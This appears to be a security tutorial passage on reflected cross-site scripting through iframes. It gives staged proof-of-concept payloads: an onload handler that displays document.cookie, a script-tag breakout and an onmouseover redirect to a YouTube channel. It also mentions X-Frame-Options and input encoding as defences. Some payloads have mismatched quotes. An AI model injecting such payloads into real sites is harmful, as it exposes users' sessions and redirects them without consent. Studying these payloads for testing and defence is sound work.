If this is the case, the attacker can expand the XSS attack to any page within the same domain that can be persuaded to load within an
<iframe>on the page with XSS vulnerability.
X-Frame-Options: DENYand/or always correctly encode all user submitted data (that is, never have an XSS vulnerability on your site - easier said than done).
Below we shall look at a few examples of IFRAMES and how we can use them along with XSS to display different information.
You can view a video example of all of the below videos here - https://youtu.be/t5jdgj8ihwY
Stage 1 - Load the Cookie of the existing user
Here we can use the following to view the cookie of the current users sessions reflectively to the page as there is an XSS vulnerability present on the server.
<IFRAME width="420" height="315" frameborder=0 onload="alert(document.cookie) ></IFRAME>&ParamHeight=250
Or using Script Tags
Stage 2 - Loading Any text from the URL into the browser via Reflective XSS
></iframe><script>alert(`THIS IS A BACKTICK`);</script><iframe frameborder="0%EF%BB%BF&ParamHeight=250
Stage 3 - Using the 'mouseover' function
Here we use the 'mouseover' functions to that redirects a user to a custom defined website based on the users cursor moving into the iframe area.
You can view an example of this here - https://youtu.be/t5jdgj8ihwY
<IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href="https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg"></IFRAME>&ParamHeight=250